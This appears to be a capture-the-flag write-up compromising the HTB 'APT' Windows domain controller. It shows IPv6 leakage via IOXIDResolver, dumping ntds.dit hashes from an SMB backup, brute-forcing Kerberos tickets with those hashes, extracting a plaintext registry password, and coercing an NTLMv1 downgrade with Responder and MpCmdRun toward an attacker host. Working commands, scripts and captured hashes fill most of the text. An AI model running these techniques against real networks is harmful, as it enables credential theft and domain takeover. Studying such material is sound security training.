Recon
IP address: 10.10.10.213
Quick port scan:

PORT    STATE SERVICE
80/tcp  open  http
135/tcp open  msrpc

Service/OS detection:

PORT    STATE SERVICE VERSION
80/tcp  open  http    Microsoft IIS httpd 10.0
|_http-title: Gigantic Hosting | Home
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
135/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (88%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (88%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Web vuln scripts:

PORT    STATE SERVICE
80/tcp  open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
135/tcp open  msrpc
Take a look at port 80.
Run a directory scan:
sudo gobuster dir -u http://10.10.10.213 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
No useful directories.
HTTrack Website Copier
Googled it: nothing exploitable there.
Checked the images for steganography.
Nothing.
Switch back to the other ports.
Googling for 135 MSRPC.
rpcdump:
export PATH=/usr/share/doc/python3-impacket/examples:$PATH
rpcdump.py 10.10.10.213 -port 135

rpcmap:
rpcmap.py ncacn_ip_tcp:10.10.10.213[135]
Brute-force UUIDs and opnums:
rpcmap.py ncacn_ip_tcp:10.10.10.213[135] -brute-uuids -brute-opnums
99FCFEC4-5260-101B-BBCB-00AA0021347A
googling…
IObjectExporter?
Look at the opnums that succeeded (3 & 5).
Both are ServerAlive methods (ServerAlive and ServerAlive2), and they answer without any authentication.
googling…
Search for:
OXID resolver
Download it:
wget https://raw.githubusercontent.com/mubix/IOXIDResolver/master/IOXIDResolver.py
./IOXIDResolver.py -t 10.10.10.213
It pulls out an IPv6 address:
dead:beef::b885:d62a:d679:573f
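What IOXIDResolver.py is doing under the hood, as an added example that is not the tool's own code: IObjectExporter::ServerAlive2 (opnum 5) answers an anonymous caller with a DUALSTRINGARRAY listing every string binding the DCOM server exposes, and that list is where the IPv6 address leaks from. The parser below decodes that wire structure (MS-DCOM 2.2.19) from raw bytes. The sample reply is constructed here to resemble what apt.htb.local returns, not a capture; the tower-id names are the standard DCE/RPC protocol identifiers. IOXIDResolver.py obtains the same bytes over ncacn_ip_tcp:<target>[135] via impacket's IObjectExporter(...).ServerAlive2() with no credentials.

```python
import struct

# RPC protocol-sequence identifiers (DCE/RPC C706 Appendix I) used in wTowerId
TOWER_IDS = {0x07: "ncacn_ip_tcp", 0x08: "ncadg_ip_udp",
             0x0F: "ncacn_np", 0x10: "ncalrpc", 0x1F: "ncacn_http"}


def _read_wstr(buf, off):
    """Read a NUL-terminated UTF-16LE string at byte offset `off`.
    Returns (string, offset just past the 2-byte terminator)."""
    end = off
    while buf[end:end + 2] != b"\x00\x00":
        end += 2
        if end >= len(buf):
            raise ValueError("unterminated string in DUALSTRINGARRAY")
    return buf[off:end].decode("utf-16-le"), end + 2


def parse_dualstringarray(buf):
    """Parse a DUALSTRINGARRAY into
    ([(protseq, network_addr), ...], [(authn_svc, principal), ...]).
    Layout: wNumEntries, wSecurityOffset (both u16, counted in u16 units),
    then STRINGBINDINGs {wTowerId, aNetworkAddr} ending with a 0 tower id,
    then SECURITYBINDINGs {wAuthnSvc, 0xFFFF, aPrincName} ending with a 0 authn."""
    num_entries, sec_off = struct.unpack_from("<HH", buf, 0)
    arr = buf[4:4 + num_entries * 2]
    if len(arr) != num_entries * 2 or sec_off > num_entries:
        raise ValueError("truncated DUALSTRINGARRAY")
    str_part, sec_part = arr[:sec_off * 2], arr[sec_off * 2:]

    bindings, off = [], 0
    while True:
        tower = struct.unpack_from("<H", str_part, off)[0]
        if tower == 0:
            break
        addr, off = _read_wstr(str_part, off + 2)
        bindings.append((TOWER_IDS.get(tower, "tower-0x%02x" % tower), addr))

    security, off = [], 0
    while True:
        authn = struct.unpack_from("<H", sec_part, off)[0]
        if authn == 0:
            break
        princ, off = _read_wstr(sec_part, off + 4)   # skip wAuthnSvc + Reserved (0xFFFF)
        security.append((authn, princ))
    return bindings, security


def ipv6_addresses(buf):
    """The IPv6 literals among the ncacn_ip_tcp bindings: what IOXIDResolver.py prints."""
    bindings, _ = parse_dualstringarray(buf)
    return [addr for proto, addr in bindings if proto == "ncacn_ip_tcp" and ":" in addr]


def build_dualstringarray(bindings, security):
    """Encoder for the same structure, used here only to construct the test sample."""
    body = b""
    for tower, addr in bindings:
        body += struct.pack("<H", tower) + addr.encode("utf-16-le") + b"\x00\x00"
    body += b"\x00\x00"
    sec_off = len(body) // 2
    for authn, princ in security:
        body += struct.pack("<HH", authn, 0xFFFF) + princ.encode("utf-16-le") + b"\x00\x00"
    body += b"\x00\x00"
    return struct.pack("<HH", len(body) // 2, sec_off) + body


# Constructed sample (not a capture): hostname, IPv4 and IPv6 bindings like a DC hands back
SAMPLE = build_dualstringarray(
    [(0x07, "apt"), (0x07, "10.10.10.213"), (0x07, "dead:beef::b885:d62a:d679:573f")],
    [(0x0A, "")],   # RPC_C_AUTHN_WINNT, empty principal
)

if __name__ == "__main__":
    for proto, addr in parse_dualstringarray(SAMPLE)[0]:
        print(proto, addr)
    print("IPv6:", ipv6_addresses(SAMPLE))
```

The point for defenders: nothing in this exchange is authenticated, so any host that can reach TCP/135 learns every address the machine is bound to, including addresses your perimeter filters never considered.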
Check whether the address is reachable:
sudo nmap -6 --min-rate 10000 -p- dead:beef::b885:d62a:d679:573f
53,80,88,135,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49675,49695,53837
88    Kerberos
5985  Windows Remote Management
47001 WinRM
So this is a domain controller. The ports at the bottom (496xx, 53837) are in the dynamic range, probably RPC endpoints started on demand.
Start service enumeration:
sudo nmap -sT -sC -O -sV -p53,80,88,135,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49675,49695,53837 -6 dead:beef::b885:d62a:d679:573f -oA nmap/v6service
PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Simple DNS Plus
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-server-header:
|   Microsoft-HTTPAPI/2.0
|_  Microsoft-IIS/10.0
|_http-title: Bad Request
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-29 15:01:52Z)
135/tcp   open  msrpc        Microsoft Windows RPC
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2023-10-29T15:03:03+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after:  2050-09-24T07:17:18
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap     Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after:  2050-09-24T07:17:18
|_ssl-date: 2023-10-29T15:03:03+00:00; 0s from scanner time.
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2023-10-29T15:03:03+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after:  2050-09-24T07:17:18
3269/tcp  open  ssl/ldap     Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after:  2050-09-24T07:17:18
|_ssl-date: 2023-10-29T15:03:03+00:00; 0s from scanner time.
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Bad Request
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc        Microsoft Windows RPC
49675/tcp open  msrpc        Microsoft Windows RPC
49695/tcp open  msrpc        Microsoft Windows RPC
53837/tcp open  msrpc        Microsoft Windows RPC
No OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94%E=6%D=10/29%OT=53%CT=%CU=%PV=N%DS=1%DC=D%G=Y%TM=653E7428%P=
OS:x86_64-pc-linux-gnu)S1(P=6000{4}28067fXX{32}0035c8a84de4f61758431873a01
OS:22000b389000002040526010303080402080a001def8cff{4}%ST=0.241679%RT=0.276
OS:587)S2(P=6000{4}28067fXX{32}0035c8a917972cc858431874a0122000b2c10000020
OS:40526010303080402080a001defefff{4}%ST=0.340627%RT=0.375607)S3(P=6000{4}
OS:28067fXX{32}0035c8aa85595bf158431875a0122000187000000204052601030308010
OS:1080a001df054ff{4}%ST=0.441347%RT=0.479882)S4(P=6000{4}28067fXX{32}0035
OS:c8ab7344ceb958431876a0122000b444000002040526010303080402080a001df0c9ff{
OS:4}%ST=0.541405%RT=0.595134)S5(P=6000{4}28067fXX{32}0035c8ac868640755843
OS:1877a01220002ef3000002040526010303080402080a001df11bff{4}%ST=0.640609%R
OS:T=0.675501)S6(P=6000{4}24067fXX{32}0035c8adba36bcb4584318789012200092ac
OS:0000020405260402080a001df17fff{4}%ST=0.740609%RT=0.776433)IE1(P=6000{4}
OS:803a7fXX{32}8100cabdabcd00{122}%ST=0.765916%RT=0.859558)TECN(P=602000{3
OS:}20067fXX{32}0035c8ae088813c65843187980522000f1a60000020405260103030801
OS:010402%ST=0.964534%RT=1.00174)EXTRA(FL=12345)

Network Distance: 1 hop
Service Info: Host: APT; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: apt
|   NetBIOS computer name: APT\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: apt.htb.local
|_  System time: 2023-10-29T15:02:55+00:00
|_clock-skew: mean: 0s, deviation: 1s, median: 0s
| smb2-time:
|   date: 2023-10-29T15:02:53
|_  start_date: 2023-10-29T14:30:27
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.40 seconds
Add a local name mapping (htb.local → the IPv6 address) and look at SMB:
sudo smbclient -L //htb.local
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        backup          Disk
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        SYSVOL          Disk      Logon server share
htb.local is an IPv6 address -- no workgroup available

sudo smbclient //htb.local/backup
smb: \> get backup.zip
Let's look at backup.zip:

┌──(root㉿kali1)-[~/Desktop/APT]
└─# unzip -l backup.zip
Archive:  backup.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
        0  2020-09-23 19:40   Active Directory/
 50331648  2020-09-23 19:38   Active Directory/ntds.dit
    16384  2020-09-23 19:38   Active Directory/ntds.jfm
        0  2020-09-23 19:40   registry/
   262144  2020-09-23 19:22   registry/SECURITY
 12582912  2020-09-23 19:22   registry/SYSTEM
---------                     -------
 63193088                     6 files
ntds.dit is the domain controller's equivalent of the SAM: the AD database with every account's hashes. ntds.jfm is the ESE flush-map file that guards ntds.dit against lost writes. Together with registry/SECURITY and registry/SYSTEM (SYSTEM holds the boot key the hashes in ntds.dit are encrypted with) these are the files that matter, but we don't know whether they differ from the current state of the domain.
sudo unzip backup.zip
It needs a password; try cracking it:
sudo zip2john backup.zip > hash4backup
john --wordlist=/usr/share/wordlists/rockyou.txt hash4backup
iloveyousomuch (backup.zip)
sudo unzip backup.zip
Next, dump the secrets out of these files. secretsdump.py can parse them offline (the LOCAL target):
secretsdump.py
secretsdump.py -ntds Active\ Directory/ntds.dit -system registry/SYSTEM LOCAL > ../user_hash_raw
That dumps about 8000 lines.
evil-winrm -i htb.local -u administrator -H '2b576acbe6bcfda7294d6bd18041b8fe'
Failed (the backup is old). Extract the usernames and hashes from every line containing ':::' into two files, username and hashlist:
cat ../user_hash_raw | grep ':::' | awk -F ':' '{print $1}' >> username
cat ../user_hash_raw | grep ':::' | awk -F ':' '{print $3,$4}' | sed 's/ /:/g' >> hashlist
Enumerate which of those users still exist (Kerberos pre-authentication):
kerbrute userenum -d htb.local --dc htb.local username
2023/11/05 13:40:19 >  [+] VALID USERNAME:       Administrator@htb.local
2023/11/05 13:40:19 >  [+] VALID USERNAME:       APT$@htb.local
2023/11/05 13:44:14 >  [+] VALID USERNAME:       henry.vinson@htb.local

Save these three to user_3.
crackmapexec smb htb.local -u user_3 -H backup/hashlist
No luck.
get_TGT.sh, a script to request a ticket with each hash in turn:

#!/bin/bash
# Feed every LM:NT pair in hashlist to getTGT.py as henry.vinson's key.
# A wrong key gets KDC_ERR_PREAUTH_FAILED; the right one writes henry.vinson@htb.local.ccache.
while IFS='' read -r LINE || [ -n "${LINE}" ]
do
    echo "------------------"
    echo "Feed the Hash:${LINE}"
    /usr/share/doc/python3-impacket/examples/getTGT.py htb.local/henry.vinson@htb.local -hashes "${LINE}"
done < hashlist
Monitor the directory for the ticket file:
watch "ls -ltr | tail -2"

henry.vinson@htb.local.ccache
aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb
Found a valid ticket; try the hash. The first half, aad3b435b51404eeaad3b435b51404ee, is the LM placeholder (no LM hash stored), so I take the NT half, e53d87d42adaa3ca32bdb34a876cbffb:
evil-winrm -i htb.local -u henry.vinson -H 'e53d87d42adaa3ca32bdb34a876cbffb'
Failed.
psexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
[*] Requesting shares on htb.local.....
[-] share 'backup' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.
wmiexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
[*] SMBv3.0 dialect used
[-] rpc_s_access_denied
dcomexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
smbexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
Try the remote registry:
reg.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\
reg.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\Software
This is the name we saw on the port-80 website earlier: GiganticHostingManagementSystem.
reg.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\Software\\GiganticHostingManagementSystem
That key gives up a username and password in the clear:
henry.vinson_adm:G1#Ny5@2dvht
Log in as that user with evil-winrm:
evil-winrm -i htb.local -u henry.vinson_adm -p 'G1#Ny5@2dvht'
Login succeeded.

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
type C:/users/henry.vinson_adm/appdata/Roaming/Microsoft/Windows/PowerShell/PSReadline/ConsoleHost_history.txt
$Cred = get-credential administrator
invoke-command -credential $Cred -computername localhost -scriptblock {Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel -Type DWORD -Value 2 -Force}
GPT:
LmCompatibilityLevel defines the authentication mode / network security protocol used between client and server when a session is established. Specifically, a LmCompatibilityLevel value of 2 means:
- The client does not send an LM response to the server.
- The server accepts LM, NTLM and NTLMv2 authentication.
- The server tries to use NTLMv2 session security, and falls back to NTLM if that fails.
Googling…
Responder (https://github.com/lgandx/Responder)
MpCmdRun.exe can be made to fetch a file from a remote path, so the DC will authenticate to our share.
git clone https://github.com/lgandx/Responder.git
sudo ./Responder.py -I tun0 --lm -v
--lm forces the LM/NTLMv1 downgrade; set a fixed 16-hex-digit challenge in Responder.conf.
On the Windows side, from the Windows Defender directory, ask it to scan a file on our share:
.\MpCmdRun.exe -Scan -scantype 3 -File \\10.10.16.2\nodexist
./ntlmv1.py --ntlmv1 APT$::HTB:6357C2E21068CA76DAEE4B944CFF3622034580F3BFECBF07:6357C2E21068CA76DAEE4B944CFF3622034580F3BFECBF07:1234567887654321
Hashfield Split: ['APT$', '', 'HTB', '6357C2E21068CA76DAEE4B944CFF3622034580F3BFECBF07', '6357C2E21068CA76DAEE4B944CFF3622034580F3BFECBF07', '1234567887654321']
Hostname: HTB
Username: APT$
Challenge: 1234567887654321
LM Response: 6357C2E21068CA76DAEE4B944CFF3622034580F3BFECBF07
NT Response: 6357C2E21068CA76DAEE4B944CFF3622034580F3BFECBF07
CT1: 6357C2E21068CA76
CT2: DAEE4B944CFF3622
CT3: 034580F3BFECBF07

To Calculate final 4 characters of NTLM hash use:
./ct3_to_ntlm.bin 034580F3BFECBF07 1234567887654321

To crack with hashcat create a file with the following contents:
6357C2E21068CA76:1234567887654321
DAEE4B944CFF3622:1234567887654321

echo "6357C2E21068CA76:1234567887654321">>14000.hash
echo "DAEE4B944CFF3622:1234567887654321">>14000.hash

To crack with hashcat:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1

To Crack with crack.sh use the following token
$NETLM$1234567887654321$6357C2E21068CA76DAEE4B944CFF3622034580F3BFECBF07
Run Responder again, this time with the challenge 1122334455667788 (the fixed challenge crack.sh's NTHASH lookup expects):
sudo ./Responder.py -I tun0 --lm -v
./ntlmv1.py --ntlmv1 APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
Hashfield Split: ['APT$', '', 'HTB', '95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384', '95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384', '1122334455667788']
Hostname: HTB
Username: APT$
Challenge: 1122334455667788
LM Response: 95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384
NT Response: 95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384
CT1: 95ACA8C7248774CB
CT2: 427E1AE5B8D5CE68
CT3: 30A49B5BB858D384

To Calculate final 4 characters of NTLM hash use:
./ct3_to_ntlm.bin 30A49B5BB858D384 1122334455667788

To crack with hashcat create a file with the following contents:
95ACA8C7248774CB:1122334455667788
427E1AE5B8D5CE68:1122334455667788

echo "95ACA8C7248774CB:1122334455667788">>14000.hash
echo "427E1AE5B8D5CE68:1122334455667788">>14000.hash

To crack with hashcat:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1

To Crack with crack.sh use the following token
NTHASH:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384
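The ntlmv1.py output above is deterministic string surgery plus one check, so here is the same logic as an added Python example (mine, not evilmog's tool). It splits the Responder line, detects whether the client used ESS / NTLMv1-SSP (the "NTLMv2 session security" the GPT note mentions: then the DES input is MD5(server challenge || client nonce)[:8], not the raw challenge, and the fixed-challenge crack.sh lookup does not apply), and emits the hashcat 14000 lines and the crack.sh token in the formats shown above. The test vectors are the two captures from this page; the ESS line is constructed. It does not do the DES work itself; that is hashcat's and ct3_to_ntlm.bin's job.

```python
import hashlib


def analyze_ntlmv1(responder_line):
    """Split a Responder NTLMv1 capture 'USER::DOMAIN:LMRESP:NTRESP:CHALLENGE' into its DES
    blocks and build the hashcat -m 14000 / crack.sh inputs, the way ntlmv1.py does."""
    fields = responder_line.strip().split(":")
    if len(fields) != 6:
        raise ValueError("expected USER::DOMAIN:LMRESP:NTRESP:CHALLENGE")
    user, _, domain, lmresp, ntresp, chall = fields
    lmresp, ntresp, chall = lmresp.upper(), ntresp.upper(), chall.upper()
    if len(lmresp) != 48 or len(ntresp) != 48 or len(chall) != 16:
        raise ValueError("not NTLMv1: responses must be 24 bytes, challenge 8 bytes")

    # ESS / NTLMv1-SSP: the LM field carries an 8-byte client nonce padded with 16 zero bytes,
    # and DES is applied to MD5(server_challenge || client_nonce)[:8] instead of the challenge.
    # Responder --lm is there to stop clients negotiating this; the check confirms it worked.
    ess = lmresp[16:] == "0" * 32
    if ess:
        client_nonce = lmresp[:16]
        eff_chall = hashlib.md5(bytes.fromhex(chall + client_nonce)).hexdigest()[:16].upper()
    else:
        eff_chall = chall

    # NT response = DES_K1(c) || DES_K2(c) || DES_K3(c), K1..K3 = consecutive 7-byte slices of
    # NThash || 00*5. K3 = NThash[14:16] || 00*5, so CT3 pins the last 2 hash bytes with at most
    # 65536 DES trials (ct3_to_ntlm.bin); CT1/CT2 need the full 2^56 DES keyspace (hashcat 14000).
    ct1, ct2, ct3 = ntresp[0:16], ntresp[16:32], ntresp[32:48]
    hashcat_14000 = [f"{ct1}:{eff_chall}", f"{ct2}:{eff_chall}"]

    if ess:
        cracksh_token = None                  # precomputed NTHASH tables assume a raw fixed challenge
    elif chall == "1122334455667788":
        cracksh_token = "NTHASH:" + ntresp    # crack.sh's fixed-challenge NTLMv1 lookup
    else:
        cracksh_token = "$NETLM$" + chall + "$" + ntresp

    return {
        "user": user, "domain": domain, "challenge": chall, "ess": ess,
        "effective_challenge": eff_chall,
        "ct1": ct1, "ct2": ct2, "ct3": ct3,
        "hashcat_14000": hashcat_14000,
        "ct3_to_ntlm_cmd": f"./ct3_to_ntlm.bin {ct3} {eff_chall}",
        "cracksh_token": cracksh_token,
    }


if __name__ == "__main__":
    import json
    line = ("APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:"
            "95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788")
    print(json.dumps(analyze_ntlmv1(line), indent=2))
```

Two things to read off the result before spending GPU time: ess must be False, otherwise the challenge you feed hashcat is wrong, and the account is APT$, the DC's machine account, so the NT hash that comes back is worth far more than one user's password.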